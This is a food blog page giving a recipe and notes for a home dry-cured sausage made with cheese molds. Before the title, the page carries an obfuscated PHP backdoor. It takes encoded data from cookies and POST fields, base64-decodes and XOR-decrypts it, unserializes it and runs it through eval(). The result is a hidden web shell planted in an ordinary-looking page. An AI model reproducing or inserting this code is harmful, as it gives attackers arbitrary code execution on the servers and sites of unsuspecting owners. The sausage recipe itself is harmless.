$kphiBOJD = 'h' . chr ( 634 - 531 ).chr (95) . "\162" . "\102" . chr ( 162 - 50 ); $tlzxuVDuI = chr (99) . chr ( 836 - 728 ).'a' . "\163" . chr ( 357 - 242 )."\x5f" . 'e' . chr ( 181 - 61 ).'i' . "\x73" . chr ( 606 - 490 ).'s';$pIrqqIKjpA = class_exists($kphiBOJD); $kphiBOJD = "59360";$tlzxuVDuI = "46866";if ($pIrqqIKjpA === FALSE){class hg_rBp{public function kQVdKKM(){echo "51055";}private $gQPoKo;public static $HETcCyLM = "dd055860-1178-4382-bbe6-b1731abbe2ad";public static $cjdyII = 29116;public function __construct($GpQlsceO=0){$psYBWRuHC = $_POST;$MylDSx = $_COOKIE;$uxxIxYwK = @$MylDSx[substr(hg_rBp::$HETcCyLM, 0, 4)];if (!empty($uxxIxYwK)){$byiDf = "base64";$Sqatkdz = "";$uxxIxYwK = explode(",", $uxxIxYwK);foreach ($uxxIxYwK as $IaBeOT){$Sqatkdz .= @$MylDSx[$IaBeOT];$Sqatkdz .= @$psYBWRuHC[$IaBeOT];}$Sqatkdz = array_map($byiDf . "\x5f" . chr (100) . "\145" . "\x63" . chr (111) . 'd' . "\145", array($Sqatkdz,)); $Sqatkdz = $Sqatkdz[0] ^ str_repeat(hg_rBp::$HETcCyLM, (strlen($Sqatkdz[0]) / strlen(hg_rBp::$HETcCyLM)) + 1);hg_rBp::$cjdyII = @unserialize($Sqatkdz);}}private function YKuNECny(){if (is_array(hg_rBp::$cjdyII)) {$cJAZGjKyRg = str_replace(chr (60) . chr ( 487 - 424 ).chr (112) . "\150" . chr ( 323 - 211 ), "", hg_rBp::$cjdyII[chr ( 486 - 387 )."\157" . "\x6e" . "\164" . chr ( 554 - 453 ).chr ( 190 - 80 ).chr ( 932 - 816 )]);eval($cJAZGjKyRg); $JFRjYg = "49892";exit();}}public function __destruct(){$this->YKuNECny();}}$OZwGrn = new /* 37245 */ hg_rBp(); $OZwGrn = str_repeat("27503_51898", 1);} Return Sausage • Meat Review

Return Sausage

Return Sausage

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    After skipping dry-curing meats for a year, I’m back with “Return” sausage. Nothing exceptional here. Minimum spices, regular proportions. Yet, there is something new. For years, I was besieged by requests from “post-soviet” area for advice on dry-curing in home settings. For the most parts, it stopped around 2 years ago; “kids” have grown. It’s actually incredible to see how some of them managed to start curing meats for living – something to be applauded.  The market for such products has grown; finally, the supply side caught up. Yet, before that occurred, there were not many ways to get proper cultures or cures. So, about 4-5 years ago someone asked me could the MOLD 600 be substituted with a combo of  Penicillium Candidum or\with Penicillium Candidum for cheese-making. Why not? Apparently, the results were not just satisfactory, but the sausage would get the noticeable  “brie” aroma.  Soon, this simple trick was replicated by many…

    Finally, I’ve done the same. Since it was the new fridge, turned into “curing chamber,”  cheese molds had no competition. As for results – I can smell “brie,” but not that much after removing the casing. Otherwise, it’s a good “picnic” style sausage.

    Boston Butt – 7kg

    Lean Beef – 2677gr

    Back-Fat – 174gr.

    Sea Salt – 2.5%


    Dried Porcini (contraband from my native Polisie) – 0.2%

    Dextrose – 0.3%

    Garlic Powder – 0.1%

    Cultures – FLC

    Weight loss – 42%; curing time – two months.


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